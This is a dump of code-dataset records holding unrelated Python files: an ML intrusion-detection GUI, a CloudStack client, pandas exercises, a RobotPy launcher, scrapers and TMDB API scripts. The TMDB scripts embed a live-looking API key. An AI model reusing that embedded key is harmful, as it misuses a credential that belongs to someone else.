headers\nHEADERS = {\n 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.92 Safari/537.36'\n}\n\n# 存储主目录\nSAVE_PATH = os.path.join(os.path.abspath('.'), 'StaticHTML')\n\n# 解析url正则\nREG_URL = r'^(https?://|//)?((?:[a-zA-Z0-9-_]+\\.)+(?:[a-zA-Z0-9-_:]+))((?:/[-_.a-zA-Z0-9]*?)*)((?<=/)[-a-zA-Z0-9]+(?:\\.([a-zA-Z0-9]+))+)?((?:\\?[a-zA-Z0-9%&=]*)*)$'\n\n# 解析url类型\nREG_RESOURCE_TYPE = r'(?:href|src|data\\-original|data\\-src)=[\"\\'](.+?\\.(?:js|css|jpg|jpeg|png|gif|svg|ico|ttf|woff2))[a-zA-Z0-9\\?\\=\\.]*[\"\\']'\n\n# 图片格式\nIMG_TYPE_ARR = ['jpg', 'png', 'ico', 'gif', 'jpeg', 'svg']\n\n# 下载文件地址列表\nDOWNLOAD_LIST = []","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"217591632","text":"import sniffer\nimport modifier\nimport pickle\nimport sklearn\nimport pandas as pd\nfrom sklearn import svm\nfrom sklearn.model_selection import train_test_split\nimport numpy as np\nfrom sklearn import metrics\nfrom tkinter import *\n# ML Model training code\n'''\ndf = pd.read_csv(r'allAttack0.csv',header=None)\ndf[0:5]\ndf[14]=df[13]\ndf[14]=1\n#df[14].unique()\n\ndf1 = pd.read_csv(r'normal3.csv',header=None)\ndf1[0:5]\ndf1[14]=df1[13]\ndf1[14]=0\n#df1[14].unique()\n\n\n\nframes=[df,df1]\ndataset=pd.concat(frames)\n\ndataset.replace('?',-9999,inplace=True)\nX=dataset.drop([0,1,14],axis=\"columns\")\ny=np.array(dataset[14])\n\nX_train,X_test,y_train,y_test=train_test_split(X,y,test_size=0.25)\nclf=svm.SVC()\nclf.fit(X_train,y_train)\ny_pred=clf.predict(X_test)\n\nprint(\"Accuracy\",metrics.accuracy_score(y_test,y_pred))\n#print(results)\n\n#Saving model\nfilename=\"microdatasetmodel.sav\"\npickle.dump(clf,open(filename,'wb'))\n'''\n\n# list of table heads\nlst = ['sip ', 'dip ', 'tcpCount', 'tcpSportCount', 'tcpDportCount', 'tcp_fin', 'tcpSyn', 'tcpPush', 'tcpAck',\n 'tcpUrg', 'udpCount', 'udpSport', 'udpDport', 'icmp count', 'Type']\n\n# Global Status Flag\nflag = 0\n\n# Globally Loading Machine Learning Model\nfilename = \"microdatasetmodel.sav\"\nload_picklemodel = pickle.load(open(filename, 'rb'))\n\n# Tkinter Start Button code\ndef start():\n print(\"Giving Flag to IDS\")\n global flag\n flag = True\n\n\n# Tkinter recursive loop code\ndef StartIDS():\n\n #Delete previous Entries before new loop\n print(len(tableFrame.winfo_children()))\n if len(tableFrame.winfo_children()):\n for i in tableFrame.winfo_children():\n i.destroy()\n\n #Displaying Table Heads\n for heads in range(len(lst)):\n e = Entry(tableFrame,width=len(lst[heads]))\n e.grid(row=0, column=heads, padx=0, pady=0)\n e.insert(END,lst[heads])\n\n # Run when Start is pressed i.e flag is True\n if flag:\n # Starting sniffer\n df = sniffer.sniff()\n # modifier.modify()\n\n # Pickle programn\n if len(df) > 0:\n df = df.fillna(value=np.nan)\n df = df.replace(np.nan, int(0))\n temp = df\n temp = temp.drop(['sip', 'dip'], axis=1)\n result = load_picklemodel.predict(temp)\n\n # output dataframe for GUI\n df[14] = result # appending ML results to dataframe\n\n # table creation\n # total number of rows and columns in list\n total_columns = 15\n total_rows = len(df.index)\n print(total_rows)\n for i in range(total_rows):\n if df.iat[i,14]==1:\n for j in range(total_columns):\n e = Entry(tableFrame,bg=\"Red\",width=len(lst[j]))\n e.grid(row=i + 2, column=j, padx=0, pady=0)\n e.insert(END, df.iat[i, j])\n else:\n for j in range(total_columns):\n e = Entry(tableFrame, width=len(lst[j]))\n e.grid(row=i + 2, column=j, padx=0, pady=0)\n e.insert(END, df.iat[i, j])\n root.after(3000,StartIDS)\n\n# Tkinter Stop Button Code\ndef stop():\n print(\"Stopping IDS\")\n global flag\n flag = 0\n\n# Close button program\ndef close():\n print(\"Closing program\")\n root.destroy()\n\n\nroot = Tk()\nroot.geometry(\"1280x720\")\nroot.title(\"MLIDS\")\n\ncontrolFrame = Frame(root)\ncontrolFrame.grid(row=0,column=0, padx=5, pady=0)\n\nstartButton = Button(controlFrame, text=\"Start\", command=start)\nstartButton.grid(row=0, column=0, padx=0, pady=5)\n\nstopButton = Button(controlFrame, text=\"Stop\", command=stop)\nstopButton.grid(row=1, column=0, padx=0, pady=5)\n\ncloseButton = Button(controlFrame, text=\"Close\", command=close)\ncloseButton.grid(row=2, column=0, padx=0, pady=5)\n\ntableFrame = Frame(root)\ntableFrame.grid(row=0,column=1)\n\nroot.after(3000,StartIDS)\n\nroot.mainloop()\n\n","sub_path":"MLIDS.py","file_name":"MLIDS.py","file_ext":"py","file_size_in_byte":3915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"53047458","text":"from Client import Client\n\n\nclass ExtendedClient(Client):\n '''\n This is designed to work with the CloudStack API extension which can be\n found at https://github.com/jasonhancock/cloudstack-api-extension\n '''\n\n def getUserData(self, args={}):\n if 'id' not in args:\n raise RuntimeError(\"Missing required argument 'id'\")\n\n return self.request('getUserData', args)\n\n def listBundles(self, args={}):\n return self.request('listBundles', args)\n\n def deployBundle(self, args={}):\n if 'bundle' not in args:\n raise RuntimeError(\"Missing required argument 'bundle'\")\n\n return self.request('bundle', args)\n\n def listVPCs(self, args={}):\n return self.request('listVPCs', args)\n\n def createVPC(self, args={}):\n if 'cidr' not in args:\n raise RuntimeError(\"Missing required argument 'cidr'\")\n if 'displaytext' not in args:\n raise RuntimeError(\"Missing required argument 'displaytext'\")\n if 'name' not in args:\n raise RuntimeError(\"Missing required argument 'name'\")\n if 'vpcofferingid' not in args:\n raise RuntimeError(\"Missing required argument 'vpcofferingid'\")\n if 'zoneid' not in args:\n raise RuntimeError(\"Missing required argument 'zoneid'\")\n return self.request('createVPC', args)\n\n def deleteVPC(self, args={}):\n if 'id' not in args:\n raise RuntimeError(\"Missing required argument 'id'\")\n return self.request('deleteVPC', args)\n","sub_path":"CloudStackClient/ExtendedClient.py","file_name":"ExtendedClient.py","file_ext":"py","file_size_in_byte":1536,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"358755967","text":"import pandas as pd\nimport numpy as np\n\ndef testBase():\n dates = pd.date_range('20200217', periods=6)\n df = pd.DataFrame(np.arange(24).reshape((6, 4)), index=dates, columns=['A', 'B', 'C', 'D'])\n '''\n A B C D\n 2020-02-17 0 1 2 3\n 2020-02-18 4 5 6 7\n 2020-02-19 8 9 10 11\n 2020-02-20 12 13 14 15\n 2020-02-21 16 17 18 19\n 2020-02-22 20 21 22 23\n '''\n df.to_csv('./data/first.csv')\n\n # 获取某行\n # 见下面通过切片获取和通过标签获取\n df['20200218':'20200218'] # 含首也含尾\n # A B C D\n # 2020-02-18 4 5 6 7\n df[1:2] # 含首不含尾\n # A B C D\n # 2020-02-18 4 5 6 7\n\n\n # 获取某列\n df['A']\n # 或\n df.A\n '''\n 2020-02-17 0\n 2020-02-18 4\n 2020-02-19 8\n 2020-02-20 12\n 2020-02-21 16\n 2020-02-22 20\n Freq: D, Name: A, dtype: int32\n '''\n\n # print(df['20200218']),这样取一行报错!!!\n df['A']['20200218'] # 先列后行来定位一个元素\n # 4\n\n # 对行进行切片\n ## 按数字索引\n print(df[0:3]) # 含首不含尾\n '''\n A B C D\n 2020-02-17 0 1 2 3\n 2020-02-18 4 5 6 7\n 2020-02-19 8 9 10 11\n '''\n\n ## 按索引名称\n print(df['20200217':'20200219']) # 含首也含尾\n '''\n A B C D\n 2020-02-17 0 1 2 3\n 2020-02-18 4 5 6 7\n 2020-02-19 8 9 10 11\n '''\n\n # 获取索引名称(loc)获取Dataframe子数据\n ## 取某一行(只能传一行)\n print(df.loc['20200218'])\n '''\n A 4\n B 5\n C 6\n D 7\n Name: 2020-02-18 00:00:00, dtype: int32\n '''\n\n ## 取某行的若干个属性(列)\n print(df.loc['20200218', ['A', 'C', 'D']])\n '''\n A 4\n C 6\n D 7\n Name: 2020-02-18 00:00:00, dtype: int32\n '''\n\n ## 获取所有行的若干属性(列)\n print(df.loc[:,['A','B']])\n # A B\n # 2020-02-17 0 1\n # 2020-02-18 4 5\n # 2020-02-19 8 9\n # 2020-02-20 12 13\n # 2020-02-21 16 17\n # 2020-02-22 20 21\n\n\n # 获取序数索引(iloc)获取Dataframe子数据\n print(df.iloc[3,1]) # 获取索引行3列1的值\n # 13\n print('-------------------------------------------')\n print(df.iloc[3:5,1:3])\n # 含首不含尾,其中单一个冒号(:)表示去这一维的所有;-1表示这一维的最后一项;(:3)表示从0到3;(3:)表示从3到最后一项(含)\n '''\n B C\n 2020-02-20 13 14\n 2020-02-21 17 18\n '''\n\n # 离散切取\n print(df.iloc[[1,3,5],1:3])\n '''\n B C\n 2020-02-18 5 6\n 2020-02-20 13 14\n 2020-02-22 21 22\n '''\n\n # 还可以通过删选切取\n print(df[df.A>8])\n '''\n A B C D\n 2020-02-20 12 13 14 15\n 2020-02-21 16 17 18 19\n 2020-02-22 20 21 22 23\n '''\n\ndef chooseCol():\n dates = pd.date_range('20200217', periods=6)\n df = pd.DataFrame(np.arange(-12, 12).reshape((6, 4)), index=dates, columns=['A', 'B', 'C', 'D'])\n print(df)\n\n cols = ['B', 'C']\n res = df[cols]\n print(res)\n\n\ndef testNumIndex():\n dates = pd.date_range('20200217', periods=6)\n df = pd.DataFrame(np.arange(24).reshape((6, 4)), index=dates, columns=['A', 'B', 'C', 'D'])\n '''\n A B C D\n 2020-02-17 0 1 2 3\n 2020-02-18 4 5 6 7\n 2020-02-19 8 9 10 11\n 2020-02-20 12 13 14 15\n 2020-02-21 16 17 18 19\n 2020-02-22 20 21 22 23\n '''\n df.to_csv('./data/first.csv')\n\n # 获取某行\n # 见下面通过切片获取和通过标签获取\n print(df['20200218':'20200218']) # 含首也含尾\n # A B C D\n # 2020-02-18 4 5 6 7\n\n print(df[-2:]) # 含首不含尾,id为1的行\n\n\n\ndef testFromLoad():\n df = pd.read_csv('./data/first.csv', index_col=0)\n # for dfi in df.iteritems(): # 按行遍历\n # print(dfi)\n\n # for dfi in df.iterrows(): # 按列遍历\n # print(dfi) # 结果是一个tuple\n\n for dfi in df.itertuples(): # 按列遍历\n print(getattr(dfi, 'A')) # 结果是一个pandas的对象,列被封装成了属性\n print(type(dfi))\n\n # for i in range(df.shape[0]):\n # print(df.iloc[i,:]) # 结果是\n # print(df.iloc[i,:]['A'])\n\ndef train():\n df = pd.read_csv('./data/first.csv', index_col=0)\n print(df)\n data = df.iloc[:,:-1].values\n print(data)\n\ndef t01test():\n dates = pd.date_range('20200217', periods=6)\n df = pd.DataFrame(np.arange(-12,12).reshape((6, 4)), index=dates, columns=['A', 'B', 'C', 'D'])\n print(df[df.A>3])\n\n # df.loc[df['color'] == 'blue', 'height'] = 175\n\n print(df.values) # 中间内容的二维表,np.array\n\n print(df.loc[:, (df==False).any(axis=0)]) # 找到存在0的列\n\ndef testAllAny():\n # 找到全0的列、存在0的列\n # 干掉全0的列、存在0的列\n dates = pd.date_range('20200217', periods=6)\n df = pd.DataFrame(np.arange(-12, 12).reshape((6, 4)), index=dates, columns=['A', 'B', 'C', 'D'])\n\n # all/any中axis是跟维度是对应的\n # df.loc[:, (df == 0).any(axis=0)] 这算是找第二维度,即列,那我需要any每一行?emm,先这么理解\n\n # 找到存在0的列\n print(df.loc[:, (df == 0).any(axis=0)]) # 找到存在0的列\n # 取反,找到不存在0的列\n print(df.loc[:, ~((df == 0).any())])\n # 换一下方式:用all,找到全不是0的\n print(df.loc[:, ((df != 0).all())])\n # 再取反,就是找存在0的\n print(df.loc[:, ((df != 0).all())])\n\n # 如果是行呢\n print(df.loc[(df == 0).any(axis=1), :]) # 找到存在0的列\n\ndef testDropNan():\n dates = pd.date_range('20200217', periods=6)\n df = pd.DataFrame(np.arange(-12, 12).reshape((6, 4)), index=dates, columns=['A', 'B', 'C', 'D'])\n df = df.replace(0, pd.NA)\n print(df)\n df.dropna(axis=0, how='all', inplace=True)\n # axis:0 删除行;1 删除列\n # how:any 存在就删除;all 全Na才删除\n # inplace: False: 返回新的数据集(默认)True: 在愿数据集上操作\n print(df)\n\ndef testColFase():\n dates = pd.date_range('20200217', periods=6)\n df = pd.DataFrame(np.arange(-12, 12).reshape((6, 4)), index=dates, columns=['A', 'B', 'C', 'D'])\n df = df.replace(-4, False)\n df = df.replace(4, pd.NA)\n df.to_csv('./data/testcolfalse.csv')\n print(df)\n\n res = df[df['A']==False] # 那些类False也会被选中,如果没对比,为空。。。;NaN不会被识别为False\n print(res)\n\n df2 = pd.read_csv('/Users/darcyzhang/Downloads/D_Chrome/image-diff_persistence/tasks/tasks.csv')\n print(df2)\n res = df2[df2['etime'] == False] # 那些类False也会被选中,如果没对比,为空。。。\n print(res)\n\nif __name__ == '__main__':\n chooseCol()\n # testColFase()\n # testDropNan()\n # testNumIndex()\n # train()\n # testFromLoad()\n # testBase()\n","sub_path":"tools/Pandaspd/t02datachoose.py","file_name":"t02datachoose.py","file_ext":"py","file_size_in_byte":7200,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"87064323","text":"# novalidate\n\nimport argparse\nimport inspect\nimport sys\n\nfrom os.path import exists\nfrom pkg_resources import iter_entry_points\n\nfrom .logconfig import configure_logging\nimport hal_impl\n\ndef _log_versions():\n import wpilib\n import hal\n import hal_impl\n\n import logging\n logger = logging.getLogger('wpilib')\n\n logger.info(\"WPILib version %s\", wpilib.__version__)\n logger.info(\"HAL base version %s; %s platform version %s\",\n hal.__version__,\n hal_impl.__halplatform__,\n hal_impl.__version__)\n if hasattr(hal_impl.version, \"__hal_version__\"):\n logger.info(\"HAL library version %s\", hal_impl.version.__hal_version__)\n\n # should we just die here?\n if hal.__version__ != wpilib.__version__ and \\\n hal.__version__ != hal_impl.__version__:\n logger.warning(\"Core component versions are not identical! This is not a supported configuration, and you may run into errors!\")\n\n if hal.isSimulation():\n logger.info(\"Running with simulated HAL.\")\n\n # check to see if we're on a RoboRIO\n # NOTE: may have false positives, but it should work well enough\n if exists('/etc/natinst/share/scs_imagemetadata.ini'):\n logger.warning(\"Running simulation HAL on actual roboRIO! This probably isn't what you want, and will probably cause difficult-to-debug issues!\")\n\n # Log third party versions\n # -> TODO: in the future, expand 3rd party HAL support here?\n for entry_point in iter_entry_points(group='robotpylib', name=None):\n # Don't actually load the entry points -- just print the\n # packages unless we need to load them\n dist = entry_point.dist\n logger.info(\"%s version %s\", dist.project_name, dist.version)\n\nclass _CustomHelpAction(argparse.Action):\n\n def __init__(self,\n option_strings,\n dest=argparse.SUPPRESS,\n default=argparse.SUPPRESS,\n help=None):\n super(_CustomHelpAction, self).__init__(\n option_strings=option_strings,\n dest=dest,\n default=default,\n nargs=0,\n help=help)\n\n def __call__(self, parser, namespace, values, option_string=None):\n parser.print_help()\n parser.exit(1) # argparse uses an exit code of zero by default\n\nargparse._HelpAction = _CustomHelpAction\n\ndef run(robot_class, **kwargs):\n '''\n This function gets called in robot.py like so::\n\n if __name__ == '__main__':\n wpilib.run(MyRobot)\n\n This function loads available entry points, parses arguments, and\n sets things up specific to RobotPy so that the robot can run. This\n function is used whether the code is running on the roboRIO or\n a simulation.\n\n :param robot_class: A class that inherits from :class:`.RobotBase`\n :param **kwargs: Keyword arguments that will be passed to the executed entry points\n :returns: This function should never return\n '''\n\n # sanity check\n if not hasattr(robot_class, 'main'):\n print(\"ERROR: run() must be passed a robot class that inherits from RobotBase (or IterativeBase/SampleBase)\")\n exit(1)\n\n parser = argparse.ArgumentParser()\n subparser = parser.add_subparsers(dest='command', help=\"commands\")\n subparser.required = True\n\n parser.add_argument('-v', '--verbose', action='store_true', default=False,\n help=\"Enable debug logging\")\n\n parser.add_argument('--ignore-plugin-errors', action='store_true', default=False,\n help=\"Ignore errors caused by RobotPy plugins (probably should fix or replace instead!)\")\n\n has_cmd = False\n\n for entry_point in iter_entry_points(group='robotpy', name=None):\n try:\n cmd_class = entry_point.load()\n except ImportError:\n if '--ignore-plugin-errors' in sys.argv:\n print(\"WARNING: Ignoring error in '%s'\" % entry_point)\n continue\n else:\n print(\"Plugin error detected in '%s' (use --ignore-plugin-errors to ignore this)\" % entry_point)\n raise\n\n cmdparser = subparser.add_parser(entry_point.name, help=inspect.getdoc(cmd_class))\n obj = cmd_class(cmdparser)\n cmdparser.set_defaults(cmdobj=obj)\n has_cmd = True\n\n if not has_cmd:\n parser.error(\"No entry points defined -- robot code can't do anything. Install packages to add entry points (see README)\")\n exit(1)\n\n options = parser.parse_args()\n\n configure_logging(options.verbose)\n\n _log_versions()\n retval = options.cmdobj.run(options, robot_class, **kwargs)\n\n if retval is None:\n retval = 0\n elif retval is True:\n retval = 0\n elif retval is False:\n retval = 1\n\n exit(retval)\n","sub_path":"env/lib/python3.6/site-packages/wpilib/_impl/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4839,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"406554643","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\nimport sys\n\nfrom mpl_toolkits.mplot3d import Axes3D\n\n\ndef import_dataset(filename):\n with open(filename) as binary_file:\n data = []\n x = []\n y = []\n z = []\n for d in binary_file:\n string = d.split()\n x.append(float(string[0]))\n y.append(float(string[1]))\n z.append(float(string[2]))\n \n array = np.ndarray(shape=(len(x), 3), dtype=float)\n\n for i in range(len(x)):\n array[i][0] = x[i]\n array[i][1] = y[i]\n array[i][2] = z[i]\n\n return array\n\nkick1 = import_dataset('kick1.dat')\n# kick2 = import_dataset('kick2.dat')\n\n# print(kick1)\n\n# fig = plt.figure()\n\n# ax = fig.add_subplot(111, projection='3d')\n# ax.scatter(kick1[:,0], kick1[:,1], kick1[:,2]) # plot the point (2,3,4) on the figure\n\n# plt.show()\n\ndef regressaoLinear(X, Y, iterations, learning_rate, W_scale = 0.05):\n print(X.shape)\n n = X.shape[1]\n m = X.shape[0]\n\n W = np.random.rand(1,n+1)*W_scale \n print(\"Init W: \", W) \n \n costs = []\n for it in range(0,iterations):\n W, j = gradient_desc(W,X,Y,m,n,learning_rate)\n costs.append(j)\n\n plotGrafico(W,X,Y,costs,iterations)\n \n\ndef plotGrafico(W,X,Y,costs,iterations):\n h = calc_h(W, X)\n fig = plt.figure()\n\n ax = fig.add_subplot(111, projection='3d')\n ax.scatter(X[:,0], X[:,1], Y[:]) \n ax.scatter(X[:,0], X[:,1], h)\n\n i = 2\n y = 1.109 - 0.050\n x = -1.192 - 0.050\n z = 1.11 - 0.01\n predX1 = []\n predX2 = []\n predH = []\n while y > 0:\n y = 1.109 - i*0.050\n x = -1.192 - i*0.050\n z = 1.11 - i*0.01\n h = calc_h(W,np.asarray([[x, y]]))\n predX1.append(x)\n predX2.append(y)\n # h = calc_h(W,np.asarray([[y, z]]))\n # predX1.append(y)\n # predX2.append(z)\n # h = calc_h(W,np.asarray([[x, z]]))\n # predX1.append(x)\n # predX2.append(z)\n\n predH.append(h)\n i+=1\n\n ax.scatter(predX1[:], predX2[:], predH[:]) # plot the point (2,3,4) on the figure\n plt.show()\n\n plt.plot(range(0,iterations),costs[:])\n plt.show()\n \n\ndef cost(h, Y):\n m = Y.shape[0]\n j = (1/(2*m))*np.sum((h-Y)**2)\n return j\n\ndef calc_h(W, X):\n m = X.shape[0]\n h = np.dot(W[0,1:],X.T).reshape((m, 1))+W[0,0]\n return h\n\ndef gradient_desc(W,X,Y,m,n,learning_rate):\n h = calc_h(W,X)\n # print(h.shape)\n # print(h)\n j = cost(h, Y)\n print(\"cost: \",j)\n\n grads = {}\n grads[\"dw0\"] = (1/m)*np.sum((h-Y))\n for i in range(1,n+1):\n grads[\"dw\"+str(i)] = (1/m)*np.sum((h-Y)*X[:,i-1])\n # print(grads)\n for i in range(0,n+1):\n W[0,i] = W[0,i] - learning_rate*grads[\"dw\"+str(i)]\n # print(W)\n return W,j\n\n\nlearning_rate = 0.005\niterations = 120\nW_scale = 0.05\nregressaoLinear(kick1[:,:2], kick1[:,2], iterations, learning_rate, W_scale)\n# regressaoLinear(kick1[:,[1,2]], kick1[:,0])\n# regressaoLinear(kick1[:,[0,2]], kick1[:,1])","sub_path":"Projeto2/testp2.py","file_name":"testp2.py","file_ext":"py","file_size_in_byte":3011,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"164408880","text":"import requests\nimport os\nimport jieba.posseg as psg\n#得到的结果根据urls返回\ndef getManyPages(keyword,pages):\n params=[]\n for i in range(1):\n params.append({\n 'tn': 'resultjson_com',\n 'ipn': 'rj',\n 'ct': 201326592,\n 'is': '',\n 'fp': 'result',\n 'queryWord': keyword,\n 'cl': 2,\n 'lm': -1,\n 'ie': 'utf-8',\n 'oe': 'utf-8',\n 'adpicid': '',\n 'st': -1,\n 'z': '',\n 'ic': 0,\n 'word': keyword,\n 's': '',\n 'se': '',\n 'tab': '',\n 'width': '',\n 'height': '',\n 'face': 0,\n 'istype': 2,\n 'qc': '',\n 'nc': 1,\n 'fr': '',\n 'pn': i,\n 'rn': 30,\n 'gsm': '1e',\n '1488942260214': ''\n })\n #所有图片来源于下面的url,当然你也可以自己设置\n url = 'https://image.baidu.com/search/acjson'\n urls = []\n for i in params:\n urls.append(requests.get(url,params=i).json().get('data'))\n return urls\n\n\ndef getImg(dataList, localPath,keyWord):\n\n if not os.path.exists(localPath): # 新建文件夹\n os.mkdir(localPath)\n\n x = 0\n for list in dataList:\n for i in list:\n if i.get('thumbURL') != None:\n print('正在下载:%s' % i.get('thumbURL'))\n ir = requests.get(i.get('thumbURL'))\n print(localPath + keyWord[0]+'.jpg')\n open(localPath + keyWord[0]+'.jpg' , 'wb').write(ir.content)\n x += 1\n return\n else:\n print('图片链接不存在')\n\n\n\ndef reptile_img(keyWord):\n # 关键字数组,根据数组里的关键字爬图片\n\n dataList = getManyPages(keyWord, 1) # 参数1:关键字,参数2:要下载的页数\n # 本地的存储路径\n localPath = './data/'\n # 下载图片并存储在本地\n getImg(dataList, localPath, keyWord)\n # for i in range(0, len(keyWord)):\n # dataList = getManyPages(keyWord[i], 1) # 参数1:关键字,参数2:要下载的页数\n # # 本地的存储路径\n # localPath = './data/'\n # # 下载图片并存储在本地\n # getImg(dataList, localPath,keyWord)\n#程序入口\n\n\ndef get_picture(keyWord,emotion):\n\n keyWord = [keyWord]\n # print(keyWord)\n # print([(x.word,x.flag) for x in psg.cut(keyWord[0])])\n keyWord = [x.word for x in psg.cut(keyWord[0]) if 'n' in x.flag]# == u'n' or x.flag == u'nr' or x.flag == u'ns']\n if len(keyWord) == 0:\n return -1\n # print(keyWord[-1])\n #\"angry\": 0, \"fear\": 1, \"happy\": 2, \"neutral\": 3, \"sad\": 4, \"surprise\": 5\n dict = {0:'生气的',1:'害怕的',2:'开心的',3:' ',4:'难过的',5:'惊讶的'}\n\n reptile_img([dict[emotion]+keyWord[-1]])\n # return ['./data/'+word+'jpg' for word in keyWord]\n # print('./data/'+keyWord[-1]+'.jpg')\n return './data/'+dict[emotion]+keyWord[-1]+'.jpg'\n\nif __name__ == '__main__':\n keyWord = ['右上方画一个太阳。']\n\n get_picture(keyWord)\n\n # reptile_img(keyWord)","sub_path":"script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":3481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"329304504","text":"#!/usr/bin/env python\n\"\"\"Entertainment Center for displaying movie posters & trailers\"\"\"\n\nfrom fresh_tomatoes import open_movies_page\nimport media\n\nMOVIES = list()\nMOVIES.append(media.Movie(\n title='The Empire Strikes Back',\n trailer_youtube_url='https://www.youtube.com/watch?v=96v4XraJEPI',\n poster_image_url='https://upload.wikimedia.org/wikipedia/en/3/3c/SW_-_Empire_Strikes_Back.jpg'))\nMOVIES.append(media.Movie(\n title='Ikiru',\n trailer_youtube_url='https://www.youtube.com/watch?v=Lc4y-asVh3c',\n poster_image_url='https://upload.wikimedia.org/wikipedia/commons/thumb/3/3a/Ikiru_poster.jpg/440px-Ikiru_poster.jpg'))\nMOVIES.append(media.Movie(\n title='Bullitt',\n trailer_youtube_url='https://www.youtube.com/watch?v=BsvD806qNM8',\n poster_image_url='https://upload.wikimedia.org/wikipedia/en/1/17/Bullitt_poster.jpg'))\nMOVIES.append(media.Movie(\n title='Die Hard',\n trailer_youtube_url='https://www.youtube.com/watch?v=2TQ-pOvI6Xo',\n poster_image_url='https://upload.wikimedia.org/wikipedia/en/7/7e/Die_hard.jpg'))\nMOVIES.append(media.Movie(\n title='The Good, the Bad and the Ugly',\n trailer_youtube_url='https://www.youtube.com/watch?v=WCN5JJY_wiA',\n poster_image_url='https://upload.wikimedia.org/wikipedia/en/4/45/Good_the_bad_and_the_ugly_poster.jpg'))\nMOVIES.append(media.Movie(\n title='The Bourne Identity',\n trailer_youtube_url='https://www.youtube.com/watch?v=FpKaB5dvQ4g',\n poster_image_url='https://upload.wikimedia.org/wikipedia/en/a/ae/BourneIdentityfilm.jpg'))\n\nopen_movies_page(MOVIES)\n\n","sub_path":"entertainment_center.py","file_name":"entertainment_center.py","file_ext":"py","file_size_in_byte":1559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"223138508","text":"\"\"\"\nhttps://leetcode.com/problems/number-complement/\n\nThe complement of an integer is the integer you get when you flip all the 0's to 1's and all the 1's to 0's in its binary representation.\n\nFor example, The integer 5 is \"101\" in binary and its complement is \"010\" which is the integer 2.\nGiven an integer num, return its complement.\n\n \n\nExample 1:\n\nInput: num = 5\nOutput: 2\nExplanation: The binary representation of 5 is 101 (no leading zero bits), and its complement is 010. So you need to output 2.\nExample 2:\n\nInput: num = 1\nOutput: 0\nExplanation: The binary representation of 1 is 1 (no leading zero bits), and its complement is 0. So you need to output 0.\n \n\nConstraints:\n\n1 <= num < 2^31\n\"\"\"\n\nclass Solution:\n def findComplement(self, num: int) -> int:\n c=0\n n = num\n while num > 0:\n c = c + 1\n num = num >> 1\n \n d = 1 << c\n \n return d - 1 - n\n \n","sub_path":"Algorithm/476. Number Complement.py","file_name":"476. Number Complement.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"459866043","text":"import requests\nfrom requests import models\nfrom tmdb import TMDBHelper\nfrom pprint import pprint\n\n\ndef popular_count():\n \"\"\"\n popular 영화목록의 개수 출력.\n \"\"\"\n tmdb = TMDBHelper('9fdc58305c6e8e783df774eb9638b740')\n url = tmdb.get_request_url(language='ko', region='KR')\n data = requests.get(url).json()\n pprint(data['results'][0])\n return len(data['results'])\n\ndef vote_average_movies():\n \"\"\"\n popular 영화목록중 vote_average가 8 이상인 영화목록 출력.\n \"\"\"\n res=[]\n tmdb = TMDBHelper('9fdc58305c6e8e783df774eb9638b740')\n url = tmdb.get_request_url(language='ko', region='KR')\n data = requests.get(url).json()\n for i in data['results']:\n if i['vote_average']>=8:\n res.append(i['title'])\n return res\n\ndef ranking():\n \"\"\"\n popular 영화목록을 정렬하여 평점순으로 5개 출력.\n \"\"\"\n res=[]\n tmp=dict()\n tmdb = TMDBHelper('9fdc58305c6e8e783df774eb9638b740')\n url = tmdb.get_request_url(language='ko', region='KR')\n data = requests.get(url).json()\n for i in data['results']:\n tmp[i['title']]=i['vote_average']\n tmp=sorted(tmp.items(), key=lambda x:x[1], reverse=True)\n for i in range(5):\n res.append(tmp[i][0])\n\n return res\n\n\ndef recommendation(title):\n \"\"\"\n 제목에 해당하는 영화가 있으면\n 해당 영화의 id를 기반으로 추천 영화 목록을 출력.\n 추천 영화가 없을 경우 [] 출력.\n 영화 id검색에 실패할 경우 None 출력.\n \"\"\"\n res=[]\n tmdb=TMDBHelper('9fdc58305c6e8e783df774eb9638b740')\n\n movie_id = tmdb.get_movie_id(title)\n if movie_id!=None:\n url=tmdb.get_request_url(method=f'/movie/{movie_id}/recommendations',language='ko',region='KR')\n data = requests.get(url).json()\n for i in data['results']:\n res.append(i['title'])\n return res\n else:\n return None\n\ndef credits(title):\n \"\"\"\n 제목에 해당하는 영화가 있으면\n 해당 영화 id를 통해 영화 상세정보를 검색하여\n 주연배우 목록과 목록을 출력.\n 영화 id검색에 실패할 경우 None 출력.\n \"\"\"\n cast=[]\n crew=[]\n tmdb=TMDBHelper('9fdc58305c6e8e783df774eb9638b740')\n\n movie_id = tmdb.get_movie_id(title)\n if movie_id!=None:\n url=tmdb.get_request_url(method=f'/movie/{movie_id}/credits',language='ko',region='KR')\n data = requests.get(url).json()\n for i in data['cast']:\n if i['cast_id']<10:\n cast.append(i['original_name'])\n\n for i in data['crew']:\n if i['department']=='Directing':\n crew.append(i['original_name'])\n print(cast,crew)\n res={'cast':cast, 'crew':crew}\n return res\n\nif __name__ == '__main__':\n print(popular_count())\n\n pprint(vote_average_movies())\n\n pprint(ranking())\n\n pprint(recommendation('기생충'))\n pprint(recommendation('그래비티'))\n pprint(recommendation('검색할 수 없는 영화'))\n\n pprint(credits('기생충'))\n pprint(credits('검색할 수 없는 